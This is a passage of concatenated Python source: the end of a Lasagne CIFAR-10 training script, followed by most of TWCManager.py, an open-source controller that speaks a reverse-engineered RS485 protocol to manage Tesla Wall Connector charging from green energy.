test_fn = theano.function([input_var, target_var], [test_loss, test_err])
# Finally, launch the training loop.
print("Starting training...")
if save_errors:
errors = []
for epoch in range(epochs):
# shrink learning rate at 50% and 75% into training
if epoch == (epochs // 2) or epoch == (epochs * 3 // 4):
eta.set_value(eta.get_value() * lasagne.utils.floatX(0.1))
# In each epoch, we do a full pass over the training data:
train_loss = 0
train_batches = len(X_train) // batchsize
batches = cifar10.iterate_minibatches(X_train, y_train, batchsize,
shuffle=True)
if augment:
batches = cifar10.augment_minibatches(batches)
batches = generate_in_background(batches)
batches = progress.progress(
batches, desc='Epoch %d/%d, Batch ' % (epoch + 1, epochs),
total=train_batches)
for inputs, targets in batches:
train_loss += train_fn(inputs, targets)
# And possibly a full pass over the validation data:
if validate:
val_loss = 0
val_err = 0
val_batches = len(X_val) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_val, y_val,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
val_loss += loss
val_err += err
# Then we print the results for this epoch:
train_loss /= train_batches
l2_loss = l2_fn()
print(" training loss:\t%.6f" % train_loss)
print(" L2 loss: \t%.6f" % l2_loss)
if save_errors:
errors.extend([train_loss, l2_loss])
if validate:
val_loss /= val_batches
val_err /= val_batches
print(" validation loss:\t%.6f" % val_loss)
print(" validation error:\t%.2f%%" % (val_err * 100))
if save_errors:
errors.extend([val_loss, val_err])
# After training, we compute and print the test error:
test_loss = 0
test_err = 0
test_batches = len(X_test) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_test, y_test,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
test_loss += loss
test_err += err
print("Final results:")
print(" test loss:\t\t%.6f" % (test_loss / test_batches))
print(" test error:\t\t%.2f%%" % (test_err / test_batches * 100))
# Optionally, we dump the network weights to a file
if save_weights:
np.savez(save_weights, *lasagne.layers.get_all_param_values(network))
# Optionally, we dump the learning curves to a file
if save_errors:
errors = np.asarray(errors).reshape(epochs, -1)
np.savez(save_errors, errors=errors)
def main():
# parse command line
parser = opts_parser()
args = parser.parse_args()
# run
train_test(**vars(args))
if __name__ == "__main__":
main()
|
TWCManager.py
|
#! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/ngardiner/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
import commentjson
import importlib
import json
import logging
import os.path
import math
import re
import sys
import time
import traceback
from datetime import datetime
import threading
from ww import f
from lib.TWCManager.TWCMaster import TWCMaster
import requests
from enum import Enum
logging.addLevelName(19, "INFO2")
logging.addLevelName(18, "INFO3")
logging.addLevelName(17, "INFO4")
logging.addLevelName(16, "INFO5")
logging.addLevelName(15, "INFO6")
logging.addLevelName(14, "INFO7")
logging.addLevelName(13, "INFO8")
logging.addLevelName(12, "INFO9")
logging.addLevelName(9, "DEBUG2")
logging.INFO2 = 19
logging.INFO3 = 18
logging.INFO4 = 17
logging.INFO5 = 16
logging.INFO6 = 15
logging.INFO7 = 14
logging.INFO8 = 13
logging.INFO9 = 12
logging.DEBUG2 = 9
logger = logging.getLogger("TWCManager")
# Define available modules for the instantiator
# All listed modules will be loaded at boot time
# Logging modules should be the first one to load
modules_available = [
"Logging.ConsoleLogging",
"Logging.FileLogging",
"Logging.SentryLogging",
"Logging.CSVLogging",
"Logging.MySQLLogging",
"Logging.SQLiteLogging",
"Protocol.TWCProtocol",
"Interface.Dummy",
"Interface.RS485",
"Interface.TCP",
"Policy.Policy",
"Vehicle.TeslaAPI",
"Control.WebIPCControl",
"Control.HTTPControl",
"Control.MQTTControl",
# "Control.OCPPControl",
"EMS.Efergy",
"EMS.Enphase",
"EMS.Fronius",
"EMS.Growatt",
"EMS.HASS",
"EMS.Kostal",
"EMS.OpenHab",
"EMS.OpenWeatherMap",
"EMS.SmartMe",
"EMS.SmartPi",
"EMS.SolarEdge",
"EMS.SolarLog",
"EMS.TeslaPowerwall2",
"EMS.TED",
"EMS.Volkszahler",
"Status.HASSStatus",
"Status.MQTTStatus",
]
# Enable support for Python Visual Studio Debugger
if "DEBUG_SECRET" in os.environ:
import ptvsd
ptvsd.enable_attach(os.environ["DEBUG_SECRET"])
ptvsd.wait_for_attach()
##########################
# Load Configuration File
config = None
jsonconfig = None
if os.path.isfile("/etc/twcmanager/config.json"):
jsonconfig = open("/etc/twcmanager/config.json")
else:
if os.path.isfile("config.json"):
jsonconfig = open("config.json")
if jsonconfig:
config = commentjson.load(jsonconfig)
else:
logger.error("Unable to find a configuration file.")
sys.exit()
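# Illustrative (not exhaustive) shape of config.json as consumed by the code
# below; the values are placeholders, consult the project documentation for
# the authoritative schema:
#
#   {
#       "config": {
#           "debugLevel": 1,
#           "fakeMaster": 1,
#           "displayMilliseconds": false,
#           "minAmpsPerTWC": 6,
#           "wiringMaxAmpsPerTWC": 40,
#           "subtractChargerLoad": true
#       }
#   }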
logLevel = config["config"].get("logLevel")
if logLevel is None:
debugLevel = config["config"].get("debugLevel", 1)
debug_to_log = {
0: 40,
1: 20,
2: 19,
3: 18,
4: 17,
5: 16,
6: 15,
7: 14,
8: 13,
9: 12,
10: 10,
11: 9,
}
for debug, log in debug_to_log.items():
if debug >= debugLevel:
logLevel = log
break
logging.getLogger().setLevel(logLevel)
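# For example, with the mapping above a legacy debugLevel of 3 resolves to
# logLevel 18 (logging.INFO3 defined earlier), while debugLevel 0 resolves to
# 40 (ERROR), i.e. only errors are logged.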
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 65535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b"\x77\x77")
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def hex_str(data):
    # Python does not overload functions by annotation, so a single helper
    # handles both str and bytes/bytearray input.
    if isinstance(data, str):
        return " ".join("{:02X}".format(ord(c)) for c in data)
    return " ".join("{:02X}".format(c) for c in data)
def time_now():
global config
return datetime.now().strftime(
"%H:%M:%S" + (".%f" if config["config"]["displayMilliseconds"] else "")
)
def unescape_msg(inmsg: bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
# Note that a bytearray is mutable, whereas a bytes object isn't.
# By initializing a bytearray and concatenating the incoming bytearray
# to it, we protect against being passed an immutable bytes object
msg = bytearray() + inmsg[0:msgLen]
# See notes in RS485.send() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
while i < len(msg):
if msg[i] == 0xDB:
if msg[i + 1] == 0xDC:
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i : i + 2] = [0xC0]
elif msg[i + 1] == 0xDD:
msg[i : i + 2] = [0xDB]
else:
logger.info(
"ERROR: Special character 0xDB in message is "
"followed by invalid character 0x%02X. "
"Message may be corrupted." % (msg[i + 1])
)
# Replace the character with something even though it's probably
# not the right thing.
msg[i : i + 2] = [0xDB]
i = i + 1
# Remove leading and trailing C0 byte.
msg = msg[1 : len(msg) - 1]
return msg
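# Illustrative sketch of the unescaping rules above (byte values invented for
# demonstration only):
#
#   >>> raw = bytearray(b"\xc0\xfd\xe0\xdb\xdc\xdb\xdd\x01\xc0")
#   >>> unescape_msg(raw, len(raw))
#   bytearray(b'\xfd\xe0\xc0\xdb\x01')
#
# The leading/trailing C0 frame markers are stripped and the escape pairs
# DB DC -> C0 and DB DD -> DB collapse back to single bytes.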
def background_tasks_thread(master):
carapi = master.getModuleByName("TeslaAPI")
while True:
try:
task = master.getBackgroundTask()
if task["cmd"] == "applyChargeLimit":
carapi.applyChargeLimit(limit=task["limit"])
elif task["cmd"] == "charge":
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
carapi.car_api_charge(task["charge"])
elif task["cmd"] == "carApiEmailPassword":
carapi.resetCarApiLastErrorTime()
carapi.car_api_available(task["email"], task["password"])
elif task["cmd"] == "checkArrival":
limit = (
carapi.lastChargeLimitApplied
if carapi.lastChargeLimitApplied != 0
else -1
)
carapi.applyChargeLimit(limit=limit, checkArrival=True)
elif task["cmd"] == "checkCharge":
carapi.updateChargeAtHome()
elif task["cmd"] == "checkDeparture":
carapi.applyChargeLimit(
limit=carapi.lastChargeLimitApplied, checkDeparture=True
)
elif task["cmd"] == "checkGreenEnergy":
check_green_energy()
elif task["cmd"] == "checkVINEntitlement":
# The two possible arguments are task["subTWC"] which tells us
# which TWC to check, or task["vin"] which tells us which VIN
if task.get("vin", None):
task["subTWC"] = master.getTWCbyVIN(task["vin"])
if task["subTWC"]:
if master.checkVINEntitlement(task["subTWC"]):
logger.info("Vehicle %s on TWC %02X%02X is permitted to charge." % (task["subTWC"].currentVIN, task["subTWC"].TWCID[0], task["subTWC"].TWCID[1]))
else:
logger.info("Vehicle %s on TWC %02X%02X is not permitted to charge. Terminating session." % (task["subTWC"].currentVIN, task["subTWC"].TWCID[0], task["subTWC"].TWCID[1]))
master.sendStopCommand(task["subTWC"].TWCID)
elif task["cmd"] == "getLifetimekWh":
master.getSlaveLifetimekWh()
elif task["cmd"] == "getVehicleVIN":
master.getVehicleVIN(task["slaveTWC"], task["vinPart"])
elif task["cmd"] == "snapHistoryData":
master.snapHistoryData()
elif task["cmd"] == "updateStatus":
update_statuses()
elif task["cmd"] == "webhook":
if config["config"].get("webhookMethod", "POST") == "GET":
requests.get(task["url"])
else:
body = master.getStatus()
requests.post(task["url"], json=body)
elif task["cmd"] == "saveSettings":
master.saveSettings()
except:
logger.info(
"%s: "
+ traceback.format_exc()
+ ", occurred when processing background task",
"BackgroundError",
extra={"colored": "red"},
)
pass
# Delete task['cmd'] from backgroundTasksCmds such that
# queue_background_task() can queue another task['cmd'] in the future.
master.deleteBackgroundTask(task)
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
master.doneBackgroundTask()
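# Tasks are queued from elsewhere in this file via master.queue_background_task(),
# e.g. master.queue_background_task({"cmd": "getLifetimekWh"}), and are consumed
# here one at a time; see the dispatch chain above for the supported "cmd" values.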
def check_green_energy():
global config, hass, master
# Check solar panel generation using an API exposed by
# the HomeAssistant API.
#
# You may need to customize the sensor entity_id values
# to match those used in your environment. This is configured
# in the config section at the top of this file.
#
# Poll all loaded EMS modules for consumption and generation values
for module in master.getModulesByType("EMS"):
master.setConsumption(module["name"], module["ref"].getConsumption())
master.setGeneration(module["name"], module["ref"].getGeneration())
# Set max amps iff charge_amps isn't specified on the policy.
if master.getModuleByName("Policy").policyIsGreen():
master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy())
def update_statuses():
# Print a status update if we are on track green energy showing the
# generation and consumption figures
maxamps = master.getMaxAmpsToDivideAmongSlaves()
maxampsDisplay = f("{maxamps:.2f}A")
if master.getModuleByName("Policy").policyIsGreen():
genwatts = master.getGeneration()
conwatts = master.getConsumption()
conoffset = master.getConsumptionOffset()
chgwatts = master.getChargerLoad()
othwatts = 0
if config["config"]["subtractChargerLoad"]:
if conwatts > 0:
othwatts = conwatts - chgwatts
if conoffset > 0:
othwatts -= conoffset
# Extra parameters to send with logs
logExtra = {
"logtype": "green_energy",
"genWatts": genwatts,
"conWatts": conwatts,
"chgWatts": chgwatts,
"colored": "magenta"
}
if ((genwatts or conwatts) and (not conoffset and not othwatts)):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
extra=logExtra,
)
elif ((genwatts or conwatts) and othwatts and not conoffset):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
extra=logExtra,
)
elif ((genwatts or conwatts) and othwatts and conoffset > 0):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s, Offset %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
f("{conoffset:.0f}W"),
extra=logExtra,
)
elif ((genwatts or conwatts) and othwatts and conoffset < 0):
logger.info(
"Green energy Generates %s (Offset %s), Consumption %s (Charger Load %s, Other Load %s)",
f("{genwatts:.0f}W"),
f("{(-1 * conoffset):.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
extra=logExtra,
)
nominalOffer = master.convertWattsToAmps(
genwatts + (chgwatts if (config["config"]["subtractChargerLoad"] and conwatts == 0) else 0)
- (conwatts - (chgwatts if (config["config"]["subtractChargerLoad"] and conwatts > 0) else 0))
)
if abs(maxamps - nominalOffer) > 0.005:
nominalOfferDisplay = f("{nominalOffer:.2f}A")
logger.debug(
f(
"Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw"
)
)
conwatts = genwatts - master.convertAmpsToWatts(maxamps)
generation = f("{master.convertWattsToAmps(genwatts):.2f}A")
consumption = f("{master.convertWattsToAmps(conwatts):.2f}A")
logger.info(
"Limiting charging to %s - %s = %s.",
generation,
consumption,
maxampsDisplay,
extra={"colored": "magenta"},
)
else:
# For all other modes, simply show the Amps to charge at
logger.info(
"Limiting charging to %s.", maxampsDisplay, extra={"colored": "magenta"}
)
# Print minimum charge for all charging policies
minchg = f("{config['config']['minAmpsPerTWC']}A")
logger.info(
"Charge when above %s (minAmpsPerTWC).", minchg, extra={"colored": "magenta"}
)
# Update Sensors with min/max amp values
for module in master.getModulesByType("Status"):
module["ref"].setStatus(
bytes("config", "UTF-8"),
"min_amps_per_twc",
"minAmpsPerTWC",
config["config"]["minAmpsPerTWC"],
"A",
)
module["ref"].setStatus(
bytes("all", "UTF-8"),
"max_amps_for_slaves",
"maxAmpsForSlaves",
master.getMaxAmpsToDivideAmongSlaves(),
"A",
)
#
# End functions
#
##############################
##############################
#
# Begin global vars
#
data = ""
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
numInitMsgsToSend = 10
msgRxCount = 0
idxSlaveToSendNextHeartbeat = 0
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ""
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
# Instantiate necessary classes
master = TWCMaster(fakeTWCID, config)
# Instantiate all modules in the modules_available list automatically
for module in modules_available:
modulename = []
if str(module).find(".") != -1:
modulename = str(module).split(".")
try:
# Pre-emptively skip modules that we know are not configured
configlocation = master.translateModuleNameToConfig(modulename)
if not config.get(configlocation[0], {}).get(configlocation[1], {}).get("enabled", 1):
# We can see that this module is explicitly disabled in config, skip it
continue
moduleref = importlib.import_module("lib.TWCManager." + module)
modclassref = getattr(moduleref, modulename[1])
modinstance = modclassref(master)
# Register the new module with master class, so every other module can
# interact with it
master.registerModule(
{"name": modulename[1], "ref": modinstance, "type": modulename[0]}
)
except ImportError as e:
logger.error(
"%s: " + str(e) + ", when importing %s, not using %s",
"ImportError",
module,
module,
extra={"colored": "red"},
)
except ModuleNotFoundError as e:
logger.info(
"%s: " + str(e) + ", when importing %s, not using %s",
"ModuleNotFoundError",
module,
module,
extra={"colored": "red"},
)
except:
raise
# Load settings from file
master.loadSettings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,))
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
logger.info(
"TWC Manager starting as fake %s with id %02X%02X and sign %02X"
% (
("Master" if config["config"]["fakeMaster"] else "Slave"),
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if config["config"]["fakeMaster"] == 1:
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if numInitMsgsToSend > 5:
master.send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif numInitMsgsToSend > 0:
master.send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if time.time() - master.getTimeLastTx() >= 1.0:
# It's been about a second since our last heartbeat.
if master.countSlaveTWC() > 0:
slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat)
if time.time() - slaveTWC.timeLastRx > 26:
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
logger.info(
"WARNING: We haven't heard from slave "
"%02X%02X for over 26 seconds. "
"Stop sending them heartbeat messages."
% (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
)
master.deleteSlaveTWC(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC():
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if (
config["config"]["fakeMaster"] != 2
and time.time() - master.getTimeLastTx() >= 10.0
):
logger.info(
"Advertise fake slave %02X%02X with sign %02X is "
"ready to link once per 10 seconds as long as master "
"hasn't sent a heartbeat in the last 10 seconds."
% (
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
master.send_slave_linkready()
# See if there's any message from the web interface.
if master.getModuleByName("WebIPCControl"):
master.getModuleByName("WebIPCControl").processIPC()
# If it has been more than 2 minutes since the last kWh value,
# queue the command to request it from slaves
if config["config"]["fakeMaster"] == 1 and (
(time.time() - master.lastkWhMessage) > (60 * 2)
):
master.lastkWhMessage = time.time()
master.queue_background_task({"cmd": "getLifetimekWh"})
# If it has been more than 1 minute since the last VIN query with no
# response, and if we haven't queried more than 5 times already for this
# slave TWC, repeat the query
master.retryVINQuery()
########################################################################
# See if there's an incoming message on the input interface.
timeMsgRxStart = time.time()
actualDataLen = 0
while True:
now = time.time()
dataLen = master.getInterfaceModule().getBufferLen()
if dataLen == 0:
if msgLen == 0:
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if now - timeMsgRxStart >= 2.0:
logger.log(
logging.INFO9,
"Msg timeout ("
+ hex_str(ignoredData)
+ ") "
+ hex_str(msg[0:msgLen]),
)
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
actualDataLen = dataLen
dataLen = 1
data = master.getInterfaceModule().read(dataLen)
if dataLen != 1:
# This should never happen
logger.info("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if msgLen == 0 and len(data) > 0 and data[0] != 0xC0:
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
logger.log(
logging.DEBUG2, "Ignoring byte %02X between messages." % (data[0])
)
ignoredData += data
continue
elif msgLen > 0 and msgLen < 15 and len(data) > 0 and data[0] == 0xC0:
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
logger.debug(
"Found end of message before full-length message received. "
"Discard and wait for new message."
)
msg = data
msgLen = 1
continue
elif dataLen and len(data) == 0:
logger.error(
"We received a buffer length of %s from the RS485 module, but data buffer length is %s. This should not occur." % (str(actualDataLen), str(len(data)))
)
if msgLen == 0:
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in sendMsg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if msgLen >= 16 and data[0] == 0xC0:
break
if msgLen >= 16:
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
                # len(msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if (
master.lastTWCResponseMsg == b""
and msg[0:2] != b"\xFB\xE0"
and msg[0:2] != b"\xFD\xE0"
and msg[0:2] != b"\xFC\xE1"
and msg[0:2] != b"\xFB\xE2"
and msg[0:2] != b"\xFD\xE2"
and msg[0:2] != b"\xFB\xEB"
and msg[0:2] != b"\xFD\xEB"
and msg[0:2] != b"\xFD\xE0"
):
master.lastTWCResponseMsg = msg
logger.log(
logging.INFO9,
"Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "",
)
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if len(msg) != 14 and len(msg) != 16 and len(msg) != 20:
logger.info(
"ERROR: Ignoring message of unexpected length %d: %s"
% (len(msg), hex_str(msg))
)
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if (checksum & 0xFF) != checksumExpected:
logger.info(
"ERROR: Checksum %X does not match %02X. Ignoring message: %s"
% (checksum, checksumExpected, hex_str(msg))
)
continue
if config["config"]["fakeMaster"] == 1:
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Start command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Stop command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(
b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if maxAmps >= 80:
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
master.setSpikeAmps(21)
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
master.setSpikeAmps(16)
if senderID == fakeTWCID:
logger.info(
"Slave TWC %02X%02X reports same TWCID as master. "
"Slave should resolve by changing its TWCID."
% (senderID[0], senderID[1])
)
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = master.newSlave(senderID, maxAmps)
if (
slaveTWC.protocolVersion == 1
and slaveTWC.minAmpsTWCSupports == 6
):
if len(msg) == 14:
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif len(msg) == 16:
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
logger.info(
"Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d."
% (
senderID[0],
senderID[1],
slaveTWC.protocolVersion,
slaveTWC.minAmpsTWCSupports,
)
)
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if slaveTWC.wiringMaxAmps > maxAmps:
logger.info(
"\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(config["config"]["wiringMaxAmpsPerTWC"])
+ " which is greater than the max "
+ str(maxAmps)
+ " amps your charger says it can handle. "
"Please review instructions in the source code and consult an "
"electrician if you don't know what to do."
)
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ""
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = master.getSlaveByID(senderID)
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
logger.info(
"ERROR: Received heartbeat message from "
"slave %02X%02X that we've not met before."
% (senderID[0], senderID[1])
)
continue
if fakeTWCID == receiverID:
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
